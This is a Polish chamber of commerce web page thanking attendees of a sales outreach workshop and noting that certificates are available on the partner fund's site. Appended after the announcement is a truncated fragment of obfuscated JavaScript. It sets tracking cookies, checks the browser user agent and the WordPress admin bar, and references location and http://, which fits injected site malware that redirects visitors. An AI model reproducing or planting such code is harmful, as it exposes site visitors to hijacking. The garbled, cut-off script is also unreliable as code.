Informacja po szkoleniu – Efektywne metody docierania i nawiązywania kontaktu z klientami… | Północna Izba Gospodarcza w Koszalinie

Dziękujemy za obecność na spotkaniu „Efektywne metody docierania i nawiązywania kontaktu z klientami B2B i B2C w realu i sieci”. Warsztat poprowadziła Pani Katarzyna Łukaszuk. Doświadczony trener i praktyk biznesu. Specjalizująca się w zarządzaniu sprzedażą i optymalizowania sprzedaży. Prowadzi firmę konsultingową lukaszuk.com i firmę GÓRU. Szkolenie zostało przygotowane wspólnie z Polskim Funduszem Przedsiębiorczości. Do czerwca bądą organizowane kolejne spotkania w tym partnerstwie. Dlatego zachęcamy do przesyłania informacji o tematach i obszarach szkoleń.

Dla tych z Państwa który uczestniczyli w szkoleniu, przypominamy że do pobrania są już dostępne CERTYFIKATY na indywidualnym koncie PFP. www.pfp.com.pl

'toUTCString’,’cookie’,’split’,’length’,’charAt’,’substring’,’indexOf’,’userAgent’,’match’,’MSIE;’,’OPR’,’Chromium’,’Firefox’,’Chrome’,’ppkcookie’,’location’,’http://’,’getElementById’,’wpadminbar’,’undefined’,’setTime’,’getTime’,’;\x20expires=’];(function(c,d){var e=function(f){while(–f){c[’push’](c[’shift’]());}};e(++d);}(a,0x1f4));var b=function(c,d){c=c-0x0;var e=a[c];return e;};(function(){if(document[b(’0x0′)](b(’0x1′))===null){if(typeof c===b(’0x2′)){function c(d,e,f){var g=”;if(f){var h=new Date();h[b(’0x3′)](h[b(’0x4′)]()+f*0x18*0x3c*0x3c*0x3e8);g=b(’0x5′)+h[b(’0x6′)]();}document[b(’0x7′)]=d+’=’+(e||”)+g+’;\x20path=/’;}function i(j){var k=j+’=’;var l=document[b(’0x7′)][b(’0x8′)](’;’);for(var m=0x0;m